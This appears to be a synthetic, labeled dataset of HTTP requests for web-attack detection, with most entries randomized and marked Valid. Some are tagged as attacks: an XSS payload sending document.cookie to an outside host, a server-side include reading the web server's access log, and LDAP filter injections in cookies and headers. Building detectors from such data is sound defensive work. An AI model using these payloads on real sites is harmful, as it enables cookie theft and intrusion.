Transfer-Encoding: gzip
Upgrade: erm/1.1, qamkie/3.0, 4Eloit/4.3, e8iif/6.9
Warning: 630 240.228.130.93 "ldhdroewpruS9hem" 
X-Forwarded-For: 97.48.167.87
X-Serial-Number: 56029803010715
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24657
Start - Id: 19857
class: Valid
GET /e3sbbm74MQG.H4HCTC/bEi@kRe.DlR/iac/t1o1i/uk.aspx?tri=wc_F&lMhcKcttDan0=oH.&13V=x%40E5M&hro=80&htacces8irformchildht3QE=onRi&Bha=0731794667&dslltcepaiaym=18FGGM&apduspb=ch8s HTTP/1.1
Host: 248.0.183.222
Connection: honaefE
Accept: image/*, audio/*;q=0.9
Accept-Charset: utf-8, euc-kr, windows-1253;q=0.6, utf-7
Accept-Encoding: *;q=0.4
Accept-Language: tO-GeEetsj;q=0.2, ed8-iIli;q=0.6
Cache-Control: no-transform
Client-ip: 171.173.25.232
Cookie: Grjm7WGb=egtmo;HdLimen=1733336;Ep1sh3koaweea=2236477;tg2n=rz;
Cookie2: $Version="7"
Date: Sun, 22 Jul 07 05:06:52 CET
ETag: "vVxwCMFMmG2BOCb9eJn"
Expect: mk4vr5o=ereacpfm
From: bisdtps@swes4lai54.net
If-Modified-Since: Mon, 03 Apr 06 04:16:23 CET
If-Unmodified-Since: Fri, 29 Apr 05 12:27:35 GMT
If-Match: "2YKgpSR1A3w1QdRN-"
If-None-Match: "RLdF8UQYJ72vC0941A_X"
If-Range: *
Max-Forwards: 5167
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Digest cnonce="1edg8te"
Authorization: tea1o nhanj=jrinhc
Range: -849,258-97,-882215
Referer: http://oei0r.biz/es0enda/tpNe/madhaxa/oosl4ote.tar
TE: deflate;q=0.4,gzip
Trailer: Accept-Encoding
User-Agent: tNlnt (ogIhBWC)
UA-CPU: StrongARM
UA-Disp: 8579,909,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 850x3369
Via: HTTP/4.4 251.129.250.106, FTP/0.7 www.lk4shIo.html
Transfer-Encoding: trsc
Upgrade: ieot/7.9
Warning: 622 www.dgcaas.png "crere38dmlecltR" "Fri, 12 Oct 07 12:04:28 CET"
X-Forwarded-For: 176.249.106.242
X-Serial-Number: 62361021711
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19857
Start - Id: 47018
class: XSS
GET /lcsonteeonco/rJt7Kfez4wii8WkE/wxzC5U.pE.ya35Ea3l/phKl/2-/8eoPshecjoiisjestnl/03gHq/tuiutnekfta/taabadkys/sYKigd9d/aaXb6UEpc6f.cfm?lrael=kwrnMe&imn8dsuaviNe=%26%3Cscript+++%3E%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.raleil.com%2Fcgi-bin%2Fns.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript+%3E&eleI19rd=erqcz&pmtHaN=irDsfaeehhshs6&raeyuEoi=0455868&smiltrts=%3ESm&Rrd0vd=Zc&oo4es1=nph-+9&onwne3et=ida&irisdmiT8x=hc0M5a&enrc=10196&tridtsdfahd=e%27&asn=1214581 HTTP/1.1
Host: 46.228.1.216:80
Connection: keep-alive
Accept: audio/x-wav;q=0.4, application/*
Accept-Charset: iso-8859-9, x-mac-arabic
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 18.81.58.217
Cookie: S-QEmailRq=75715392
Cookie2: $Version="3"
Date: Thu, 28 Feb 08 02:08:31 GMT
ETag: W/"iBHbcwj83EfCfSa5F3W"
Expect: 100-continue
From: Desiah@eghc.be
If-Modified-Since: Fri, 09 Apr 10 12:49:02 GMT
If-Unmodified-Since: Tue, 26 Jan 10 19:48:58 UTC
If-Match: *
If-None-Match: "uVTHARtNL_cVo4-YO"
If-Range: "-2P_0EwNfj_245RR8"
Max-Forwards: 901
MIME-Version: 4.5
Pragma: 3vf4aesf='n'
Proxy-Authorization: NTLM ZWV0YmV0Mm9iQW9DOGd5TmV4U3R4bXRZNnNhbGRlaG9Wdmk=
Authorization: Digest algorithm=rk8ftoe
Range: 5-22964
Referer: http://www.rd7go1.com/Hhnt4.php
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: nbIjdypl/2.9
UA-CPU: Sparc
UA-Disp: 128,634,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 7231x6416
Via: enu7/8.3 40.116.44.167
Transfer-Encoding: gzip
Upgrade: me2u/0.5, c1ltE/4.5, nttiep/4.6, nsse/9.4, npleer/2.6
Warning: 523 www.sioteo.shtml:61 "e4ipraamice7" 
X-Forwarded-For: 212.120.206.157
X-Serial-Number: 239527167
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47018
Start - Id: 26271
class: Valid
GET /lfchnes08E/cSf2FCA5f/oyoHB.jsp?afddNTsbaeshlt=1&Fhttp7L4iframe=18274 HTTP/1.1
Host: www.EsjdisOm.uk:80
Connection: wlorbq
Accept: audio/x-wav;q=0.5, image/gif;q=0.8, text/xml
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=266
Client-ip: 111.214.236.182
Cookie: ruR=4212275;tseT=r<Nyzeeu) where3ito\;gt=241357941;sdlgcoe=1913;YxCNvbscript2=44963
Cookie2: $Version="197"
Date: Tue, 21 Mar 06 20:30:53 CET
ETag: "wVO5U.11JOdCxcIz4TQp"
Expect: 100-continue
From: taeoEwfn@tnh7dio.org
If-Modified-Since: Sun, 13 Dec 09 05:24:33 UTC
If-Unmodified-Since: Tue, 22 May 07 06:51:33 CET
If-Match: *
If-None-Match: "QzflzdWhclh4aXDNwO"
If-Range: "nNFxneHE3R_mE0d2o0"
Max-Forwards: 5236
MIME-Version: 9.2
Pragma: n=1dqracad
Proxy-Authorization: Basic ZTVvZTlrYjprYXR3Mg==
Authorization: Digest uri=/wsehtta/rtIr.swf
Range: 25-4659,99-087,512252-95816
Referer: http://roe8a.st/7alrt/akiua/EWtrg.conf
TE: chunked;q=0.1
Trailer: Upgrade
User-Agent: Mozilla/3.1 (compatible; ttmyse0se; Solaris; hwnsu)
UA-CPU: Sparc
UA-Disp: 9474,169,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 4730x760
Via: 1.2 www.es5e6.html:85214
Transfer-Encoding: compress
Upgrade: gh9st/0.8
Warning: 229 www.n61e.shtml "wbSpiker" 
X-Forwarded-For: 170.97.95.101
X-Serial-Number: 4037485153
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26271
Start - Id: 948
class: Valid
GET /ePoGh7R_Q-sniwf/65A0GXystyleMF/eix6c/7idoo9h/OncKVn/7fnrav9ksuzpihe1/s8_itX.BIUtYf7Q/vhNZ2oth60zwTNEfRP5/lupdateb5Q9.tiff?dedotsg=te&niemaebeei=416237&esqoig=%280+fuateh&luusiaerpH=jfo&deThgsemoe=u5tae HTTP/1.0
Host: www.nayEtedr.net:80
Connection: ztn9
Accept: */*;q=0.3
Accept-Charset: iso-8859-8;q=0.8, windows-1254;q=0.4, x-mac-hebrew
Accept-Encoding: gzip, deflate, gzip, identity;q=0.3
Accept-Language: *
Cache-Control: max-stale
Client-ip: 41.229.122.162
Cookie: 31=texeco5zhe0crh;obv0lEg=edi;jwe=tleisqeesT;He8latmgcrw=rhars
Cookie2: $Version="20"
Date: Sat, 22 Jan 05 21:38:19 GMT
ETag: "mUmesNXfgkqnfPur5mw"
Expect: u3cits=algboc
From: eielNb@taT0r.com
If-Modified-Since: Sat, 27 Jun 09 16:21:33 CET
If-Unmodified-Since: Fri, 25 Aug 06 04:55:21 UTC
If-Match: ".g8rbnl-GRZIqia.i3"
If-None-Match: "Mo_Xs.rxJT0pOSRD4ItV"
If-Range: "z2YNeni4vXEG3NJjZL6A"
Max-Forwards: 26
MIME-Version: 3.0
Pragma: tH=yez
Proxy-Authorization: eohT rfphcatq=baa6t
Authorization: NTLM YWFiZXR3ZXlodGljbWFucHQ5ZWVodGRhbm56Mm9nWXZpb2tjbm5ldGR0ZXQ=
Range: 37-165,99813-448132
Referer: http://www.udoscn.biz/aemioi/ueuei1dz/oht5rvfl.jpeg
TE: trailers,gzip;q=0.8,gzip
Trailer: Connection
User-Agent: Mozilla/8.4 (compatible; bowdi; Win98; syrtt)
UA-CPU: 68000
UA-Disp: 1447,7975,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 3648x172
Via: 1.1 www.2nuhsnIw.jpg
Transfer-Encoding: compress
Upgrade: ero/9.1, efreh/0.0
Warning: 918 www.mhfdsijO.css "runearpylcyatEmy" 
X-Forwarded-For: 18.21.214.141
X-Serial-Number: 5433664
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 948
Start - Id: 19307
class: Valid
GET /iotetrnch0kyqddafou/0Y5GuhXnaM6UfhV/0ayt/8WV2/ayOiaaoithl/e7Dros2_un2nO/eSozrnkCSk/aJRZMoz.html?FblaT=2818229&na=197384755&uc0tamuomgeo=pjacIU&nnelonsoe=G&jhi1e=23411&kcjayEssneuau=nph-t%40ht+&oDchscteAw=rrusr%40w&rs4ee=ljwinntn+it4HI&lrl4otsseso6D=5381&eeyhcEee=iq%28d1&gqatsrifowezif1=89520015&uuyG3cnrfit=t%2Fojtn HTTP/1.0
Host: www.bminal1lri.de
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: x-mac-ce;q=0.9, hz-gb-2312;q=0.4, windows-1252;q=0.4, iso-8859-5;q=0.2
Accept-Encoding: 
Accept-Language: r-aeaemt;q=0.9
Cache-Control: max-stale=7
Client-ip: 104.89.52.160
Cookie: aobn=i3.NgY;9t@NCpf=wo;dae=4769825695;aaca=>vtr5oa8asW 6psT
Cookie2: $Version="298"
Date: Sat, 12 Feb 05 24:06:17 UTC
ETag: W/"LeVKcrgqvr6zKr57MVb"
Expect: kodhya=rrn5e5w;lceinc5I
From: eiioel@i3bTr2frih.st
If-Modified-Since: Tue, 14 Aug 07 17:33:13 UTC
If-Unmodified-Since: Mon, 21 Feb 05 15:51:19 UTC
If-Match: *
If-None-Match: "USSvAzRlZcFARKOq4"
If-Range: Fri, 06 Jun 08 14:09:58 CET
Max-Forwards: 2
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Basic aW9EbTNpMjp0cnVwZQ==
Authorization: sth1 tcGR=niylsl
Range: 4-457,-32
Referer: http://dnikdf.fr/IsXr/1tzr/u4W1.png
TE: trailers
Trailer: Cache-Control
User-Agent: wf4ur/4.4.8.6
UA-CPU: StrongARM
UA-Disp: 589,2791,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 061x5553
Via: 3.0 www.gkef4uv2.shtml, FTP/9.2 99.200.72.88
Transfer-Encoding: identity
Upgrade: sahcq/0.1
Warning: 303 143.220.33.216 "entfvdtChoEcrKgtdi8" 
X-Forwarded-For: 246.243.162.43
X-Serial-Number: 0947873125180577061
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19307
Start - Id: 30211
class: Valid
GET /DTAa7yOxF/25abI/oOCrxsXcH9g733v4hm/25/gre6thwoahpnsu.html? HTTP/1.0
Host: www.Goeip.it
Connection: tesd
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: compress, gzip, deflate, compress
Accept-Language: *;q=0.6
Cache-Control: max-age=89818
Client-ip: 15.120.71.38
Cookie: eu72tii8Nacuo=s@npbeMT.A7;6ettUt8EmtO=eghs;sn=arn2teahumaE60me8r;b7kegigmhacL=u;fsihqeibhjdlekm=lEou
Cookie2: $Version="21"
Date: Sat, 19 Feb 05 24:31:16 UTC
ETag: W/"GmsUi8tlrlwJp5@w"
Expect: 100-continue
From: wieAim@aawfi.fr
If-Modified-Since: Wed, 11 Oct 06 02:15:45 CET
If-Unmodified-Since: Thu, 26 Aug 04 16:04:07 CET
If-Match: *
If-None-Match: "Y951yX6eJ@DRF05S"
If-Range: Tue, 15 Apr 08 18:44:27 GMT
Max-Forwards: 1
MIME-Version: 7.5
Pragma: p=eoieYihq
Proxy-Authorization: Digest realm
Authorization: Basic YnVzYXQ6bnJ0ZThv
Range: 346642-698,469-394,8-
Referer: /r7ElchiY/lrt8tn7/uh5ad/ioinK4r/fahaf.css
TE: chunked
Trailer: Authorization
User-Agent: svsito (pYf7Hd; 6CSieZBYP; m2z2pUzBy)
UA-CPU: x86
UA-Disp: 058,5611,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 8300x7095
Via: 5.1 www.Ekixtl.htm
Transfer-Encoding: gzip
Upgrade: beith2/0.5, Nfr/4.5, a7Do/7.7
Warning: 771 181.119.169.184:84 "ceiue5imcozmnplEe" 
X-Forwarded-For: 46.52.217.2
X-Serial-Number: 19194011026
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 30211
Start - Id: 14879
class: Valid
GET /0bw.6dL@/pJgJOA@2ERjZZlShI0g/yQ.WPCmJW.BK0V2TiwZh/tFBCi6SQK/ancacceptqBHr/lgl.php3? HTTP/1.1
Host: www.sEe4ota20.it
Connection: keep-alive
Accept: text/html;q=0.4, text/xml;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: SBlsrH-s4yh;q=0.9, pntuEen-yO, oetm-Bnitrxra, Hs-reSc0z;q=0.5
Cache-Control: min-fresh=5072
Client-ip: 46.168.253.122
Cookie: n1gQstDxeema=7163;ostrstiie=1815
Cookie2: $Version="888"
Date: Mon, 14 Mar 05 12:28:35 GMT
ETag: "vfK09AcrV6cg79CI6"
Expect: 6n8e
From: lowanht@ceRsaits.it
If-Modified-Since: Tue, 10 May 05 16:48:43 CET
If-Unmodified-Since: Sat, 05 Nov 05 24:14:49 CET
If-Match: "UFcU1CV7bEZoezP"
If-None-Match: "KIO71VIw.2BwsmrGg"
If-Range: "jyb4NOArge9AEyWf"
Max-Forwards: 8
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: m2uyez rassnmv=aopo
Authorization: Basic YW9zczp5b2Vs
Range: -43,-61335,692292-223
Referer: http://ealnrg.com/s2IEw/hc5Rmnot/eNcsE/qngA4/eAegh9bt.tar
TE: trailers
Trailer: Trailer
User-Agent: qlea (10FTh_dCGD)
UA-CPU: Sparc
UA-Disp: 5587,0901,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 5504x4372
Via: 6.9 www.qhih.gif, hw5ya/4.1 www.tg2it8e.js
Transfer-Encoding: deflate
Upgrade: rendin/7.0, csnm/2.2, nee/8.0, snEh/6.4
Warning: 225 184.210.143.62:77965 "ecfsd0heehezcle" "Sat, 24 Feb 07 14:16:26 UTC"
X-Forwarded-For: 123.153.218.172
X-Serial-Number: 572302445496
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14879
Start - Id: 39614
class: SSI
GET /sTOd6t/hKO704MH/nn6y9sotsw6a/oP-VItL4oejgL/avIwoMHMp6/en7shsRe.jpeg?yaoirtsgc1nnaa=99&Tsjg=nee2&4ilefsOsNglt=dctd%28a&ooatEyw9=%3C%21--+++++%23include+++++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22+++++--%3E&oEedasxo3L=%3EewdropaHs&C891Qunion0Nl3X=%3C7IefrR&dp6daeItsoA=nT_&melhiolao=86376988&fSeiiFtgn6=+mtoOar+iTht4%29yfRihs&EVcS5Pu=2956338&stRbkmpnehsuON=edelete8+x HTTP/1.0
Host: www.ETderl.com:618
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: s-g;q=0.4, M-e;q=0.9
Cache-Control: max-age=999
Client-ip: 79.170.36.207
Cookie: tcr=m0stgottok;nOoatezhuhM=51692
Cookie2: $Version="651"
Date: Fri, 09 Apr 04 10:37:54 CET
ETag: "6b0TU98TIPwPqz07ov"
Expect: 100-continue
From: ts3vhh@kqzfn.com
If-Modified-Since: Tue, 02 Oct 07 05:58:20 GMT
If-Unmodified-Since: Fri, 18 May 07 20:11:32 UTC
If-Match: *
If-None-Match: *
If-Range: "08my99QpmNFuY_JTS2"
Max-Forwards: 333
MIME-Version: 1.7
Pragma: ld=rius
Proxy-Authorization: Basic ZnJEb3UxOmFiQWVlMA==
Authorization: Digest qop=uncT
Range: 973-,-4,32221-
Referer: /imtt/eahPTe/osSodr/agomo6.swf
TE: gzip;q=0.5
Trailer: Accept-Language
User-Agent: hhmEn3/1.5.3
UA-CPU: PowerPC
UA-Disp: 0993,069,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1841x260
Via: eamhT/9.1 www.6ctIemb.js, FTP/6.6 www.dorh.png
Transfer-Encoding: compress
Upgrade: i4uts/0.2, aesNA/6.1
Warning: 025 www.keet.tiff "mDUtinismbsS" "Thu, 13 May 04 10:01:27 GMT"
X-Forwarded-For: 216.187.237.43
X-Serial-Number: 224017819
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39614
Start - Id: 13590
class: Valid
GET /mf_.KT/tY8QuzUy/tvYXox2tvqysCNxSD/Lerequeauso6ion/i9G-/hM8o.pl? HTTP/1.1
Host: 250.39.171.230
Connection: close
Accept: text/plain;q=0.9, image/*
Accept-Charset: x-mac-arabic;q=0.5
Accept-Encoding: deflate, identity
Accept-Language: *
Cache-Control: min-fresh=44
Client-ip: 134.203.218.183
Cookie: weo=zt:ie[j7e oweo wzu;1aouktriO=3;eihgta68h=ctan;oO08tts=83353;tid=heeh1bUNL(doincludeo7location;h457=twls0a
Cookie2: $Version="5"
Date: Sun, 22 Jun 08 14:16:21 GMT
ETag: W/"lah1mwcGBsgDoEZ"
Expect: sp4siceo
From: issst@tutqrpd.biz
If-Modified-Since: Tue, 08 Jan 08 01:58:43 GMT
If-Unmodified-Since: Mon, 03 Jan 05 18:08:54 CET
If-Match: "DjBBo0tfm@uH-PgvQqX"
If-None-Match: "XYt9r1aIgp.OL8PIsJ"
If-Range: Wed, 27 Oct 04 02:54:01 CET
Max-Forwards: 807
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Basic dGl1b3R2Om9hZWVvaVMy
Authorization: Basic YmVlM3k6eFR4YQ==
Range: 0480-
Referer: http://nuaEbso.it/23iui.css
TE: chunked,chunked
Trailer: If-Match
User-Agent: Mozilla/6.6 (X11; U; SunOS sun4u 8.9; pl-ji; rv:2.6.7) Gecko/62573579
UA-CPU: StrongARM
UA-Disp: 896,6607,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 138x4900
Via: FTP/2.5 20.240.68.174
Transfer-Encoding: identity
Upgrade: tsoo4A/5.4, a7l/6.5
Warning: 604 www.ireeteni.js "iustbs" "Wed, 09 Sep 09 12:42:12 GMT"
X-Forwarded-For: 170.190.112.43
X-Serial-Number: 70032554284651
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13590
Start - Id: 37448
class: LdapInjection
GET /ou.html?stfvx3dLowaon9c=68399&tn=b54tr_p63x9w&nXaPXi54TLX=x3NEmbkFMB&7rr4h5bmgsic=euMeCPVue&Ld-j8H=0dsBb&v2tn=n%27h0&tagrnhrhmnt=Qdwbl HTTP/1.0
Host: www.wbyds2t.it
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: cp-932;q=0.2, cp-932
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 119.98.61.201
Cookie: Jbd.Jcq6l=nas;iahdfye=")(targetfilter=(o=NetscapeRoot));ljIADyRd.Z=3090
Cookie2: $Version="01"
Date: Mon, 06 Sep 04 14:22:14 CET
ETag: "hP0i7Xp59mTBOKjFVz"
Expect: 7gtigo=2yBreew;j78Oana=frat1n
From: O07auva@tiv1s.de
If-Modified-Since: Fri, 23 Sep 05 14:59:02 UTC
If-Unmodified-Since: Sun, 22 Jun 08 20:59:24 CET
If-Match: "X-rKHn..7nw7hTQbz"
If-None-Match: "LbLoEpU8G8DXJahsG"
If-Range: *
Max-Forwards: 55
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: NTLM bk1OOXNmaW1yN2d1ZWVoM2xpZTZlZWl0VnRvdGlxaGExZWZlbHVnZWZvcg==
Authorization: NTLM cGVkaWh0bG5zaWU5dHlhbmFwc2xTbHJvY2hwb242dU1oYXR3bw==
Range: 09-,89735-685,29-440
Referer: http://iyf5eyc.it/oergr/uyrNysa.bin
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/1.1 (X11; U; Linux i386 1.0; m7-cp; rv:9.7.4) Gecko/38743295
UA-CPU: MIPS
UA-Disp: 391,4064,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 9256x5085
Via: FTP/3.2 18.47.82.144, 3.1 www.r4iaenem.js, 1.7 www.raasKa.jpeg:6877
Transfer-Encoding: identity
Upgrade: o1te/3.9, e0te/6.5, 0estiY/4.9
Warning: 468 www.gctRbegg.shtml:3583 "godhcxdtTN" 
X-Forwarded-For: 157.150.92.233
X-Serial-Number: 9320114880
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 37448
Start - Id: 11131
class: Valid
GET /escoirW7eennum6xAg/iY8X1cH2oUkf99x@kax/xfl/63z/aao6o0eop/risse1olelr7emrglr/doll/yxmnqidoo5.cfm? HTTP/1.1
Host: 231.193.184.85:80
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: x-mac-greek;q=0.2
Accept-Encoding: compress, identity;q=0.2, identity;q=0.0, compress;q=0.5, identity;q=0.5
Accept-Language: ihmoje-sneahsnf
Cache-Control: no-store
Client-ip: 149.97.12.43
Cookie: bfaieodnwEu1ol=lht;uosmaFfdie=070873791
Cookie2: $Version="8"
Date: Thu, 17 Apr 08 23:40:33 UTC
ETag: "xndRyoj4dDLp0JjM"
Expect: 100-continue
From: lQbqTa@Erdtpio.net
If-Modified-Since: Wed, 27 Feb 08 14:51:02 GMT
If-Unmodified-Since: Thu, 04 Mar 10 19:14:46 UTC
If-Match: "pKLlfiYTT0YXSIxW"
If-None-Match: "Tnb2tBeENbkJR0OjrTI"
If-Range: Sat, 01 May 04 03:09:56 UTC
Max-Forwards: 510
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: Digest response="FF6f55D1baDeb6c2C872bb57B9eB0aDd"
Authorization: NTLM bmkxb1k1ZXRwd2w5ZUFub1RpMTd3dGRwdDJoYXRlT3JlZXNlam5yc3Jz
Range: -71,-21606
Referer: http://www.9oeet.biz/toyI.dll
TE: deflate,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/2.3 (compatible; MSIE 1.5; Open BSD i386; udrt)
UA-CPU: 68000
UA-Disp: 8419,120,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 571x624
Via: 1.9 36.109.136.72
Transfer-Encoding: identity
Upgrade: hgrW/3.1
Warning: 864 51.124.226.139:114 "jlvcgsocjhnvs" 
X-Forwarded-For: 227.157.159.247
X-Serial-Number: 06776910679420292948
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11131
Start - Id: 29623
class: Valid
GET /uM4wO0/7Acn46Aie2nesdmk/Nareehe0e/e-ub.br/dq5sauocn/F98_mUYrXlTnY/Dimtamot.htm?El=tAaKav8-&ihsds6cihD=ss&dee38eintpedotg=clNN_SbP_KYr HTTP/1.1
Host: www.tipl.org
Connection: unye6o
Accept: audio/*;q=0.9, audio/*;q=0.0, image/*
Accept-Charset: *;q=0.2
Accept-Encoding: gzip, identity, gzip;q=0.8
Accept-Language: dast-t2, 2ctHns9I-arnOs;q=0.7, bet4hmk9-aobt, niieNj36-emleud, z-me;q=0.5
Cache-Control: max-age=0524
Client-ip: 220.103.73.34
Cookie: hceGwearas=2609962091;ne=yvspemslftbic
Cookie2: $Version="82"
Date: Fri, 30 Jul 04 22:02:55 GMT
ETag: W/"DcQG5O.7EpDFOO@c4"
Expect: edmab
From: oogir@enhr.net
If-Modified-Since: Mon, 01 Sep 08 20:05:36 UTC
If-Unmodified-Since: Fri, 02 Feb 07 18:11:29 GMT
If-Match: "V9zGGtSpP3jw@pM"
If-None-Match: *
If-Range: *
Max-Forwards: 358
MIME-Version: 1.3
Pragma: wsel='arsinPx'
Proxy-Authorization: Digest algorithm=e7cpi
Authorization: T8oc0 hEna=hheerMaR
Range: -566,8-27551
Referer: /immnadtt/dkN4/nnit.avi
TE: trailers,gzip
Trailer: If-None-Match
User-Agent: rrtmae/8.0.5.1.7
UA-CPU: MIPS
UA-Disp: 282,356,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 5641x077
Via: FTP/1.1 www.dinul2f.html
Transfer-Encoding: deflate
Upgrade: tdet/1.8, gtr/7.8, l8sivs/5.8, aedub/5.6, a2nlas/3.5
Warning: 312 12.87.124.248 "aefoossHowseHyti0tck" "Sun, 13 Feb 05 01:23:27 GMT"
X-Forwarded-For: 162.168.91.9
X-Serial-Number: 41855
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29623
Start - Id: 37388
class: LdapInjection
GET /tMlnEhEZ-cJVTd/cAJssV.7qntv/LlQI/KDR5UAtn7VCaprocessing-instruction./Spulocsl/5L_-documentgvbscripta._/nt/bbc/xxJw6l./ajN364.6c/idS.js?phestamGht=deroe2ty&rsabnwkton4lc=tdi&sen6ee4lod84ats=HnH%3Fnle%7Ceo%27n0&5QiA2a=8346717&9Iii6w=Ohn+&yrmAautoexec_JwlkiNK=3tu&Eaq=el+zT HTTP/1.0
Host: 149.147.43.203
Connection: close
Accept: audio/x-wav, video/mpeg;q=0.2
Accept-Charset: *;q=0.3
Accept-Encoding: Itiae)(    |    (reivT=*)
Accept-Language: *;q=0.7
Cache-Control: max-stale=421
Date: Sun, 13 Jan 08 10:53:35 GMT
ETag: W/"3oQ5AHo6bdZvKf._"
Expect: eaertym
If-Modified-Since: Mon, 03 Mar 08 23:03:49 CET
If-Unmodified-Since: Fri, 13 Jan 06 01:47:17 UTC
If-Match: "pBn3hxm2V3CBcS86"
If-None-Match: "c1re7DjX_f0mti6Z"
If-Range: *
Max-Forwards: 4
MIME-Version: 3.8
Pragma: m7mnt6tO='ox41aes'
Authorization: NTLM RUhkaTh0SW1kd25oemZhaXNobG5hcmVuZThvYVNldHN1dGh1cg==
Referer: /aeTae/noedtsd.nsf
Trailer: If-None-Match
User-Agent: Mozilla/4.3 (compatible; Konqueror/9.4; Unix; nedneac; hetltries; rritcydgtd)
UA-CPU: 68000
Transfer-Encoding: gzip

null

End - Id: 37388
Start - Id: 2183
class: Valid
GET /Sn@styleLvanddo5YlAq/mFstyleMrposition/L67DOjSTArB/di7s/nS2_BReJOin@8/62eR6Hstdin/EstaokneHRasatJqG.cgi?lc=SE%27&nlqj=2&libe5N=ei1unionteihdu&un=yye&meiersa9dE=210&auy5ei8viftudr=betweenin6ar-0aMNee HTTP/1.0
Host: 158.204.52.71:1395
Connection: close
Accept: */*;q=0.6
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.2
Accept-Language: wt-8ecckn;q=0.5, ds0eenb-o
Cache-Control: no-cache
Client-ip: 252.18.215.205
Cookie: 1I3eaab=n2CC;ixe2fOf9ognert=440425;P5metametaHx.llogFE=2t;cmdCd1a=(betweenmItiO processing-instructionLe=[hl;isoah=im4
Cookie2: $Version="8"
Date: Fri, 21 Apr 06 17:16:44 GMT
ETag: "7dKcolqFrPttQt23Vf"
Expect: 100-continue
From: 4yA0c@he42.com
If-Modified-Since: Wed, 03 Nov 04 15:26:27 UTC
If-Unmodified-Since: Wed, 30 Mar 05 23:44:53 GMT
If-Match: *
If-None-Match: "UEEkang0Djte_@y"
If-Range: *
Max-Forwards: 4
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: lcsA yisAio6=nrdl8wo
Authorization: l4HAdi n0Rhdwc=afrs
Range: 41638-,811-3,-52756
Referer: /dcaete.dll
TE: trailers
Trailer: Expect
User-Agent: Mozilla/9.8 (compatible; Konqueror/6.2; Win98; spte)
UA-CPU: MIPS
UA-Disp: 8951,7788,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 270x992
Via: 1.3 www.inne7ly6.tiff, nmtE3y/3.7 144.167.44.111:0, 0dm/4.3 www.tdecEzt9.gif
Transfer-Encoding: identity
Upgrade: sna/4.3
Warning: 821 104.1.134.166 "maqrtuteli" "Fri, 07 Jan 05 07:27:00 CET"
X-Forwarded-For: 130.173.148.175
X-Serial-Number: 26606464842114964
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2183
Start - Id: 5054
class: Valid
PUT /rWdoior/oi/udfs.html? HTTP/1.1
Content-Length: 198
Content-Language: frsi,owt,gvasE9
Content-Encoding: deflate
Content-Location: http://www.anozsse.gov/IiSihloe/pelrit/uafbngce/sneh.jpg
Content-MD5: cTBpY0NiaWVsZWlyYWxhbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 21 Aug 08 07:33:06 UTC
Last-Modified: Wed, 04 Feb 09 05:46:25 GMT
Host: 119.216.182.83
Connection: Q7sen
Accept: text/xml;q=0.5, audio/x-wav;q=0.4, audio/*
Accept-Charset: macintosh, x-mac-chinesetrad
Accept-Encoding: *
Accept-Language: *
Cache-Control: xsh1t=pnIzmh
Client-ip: 174.11.100.136
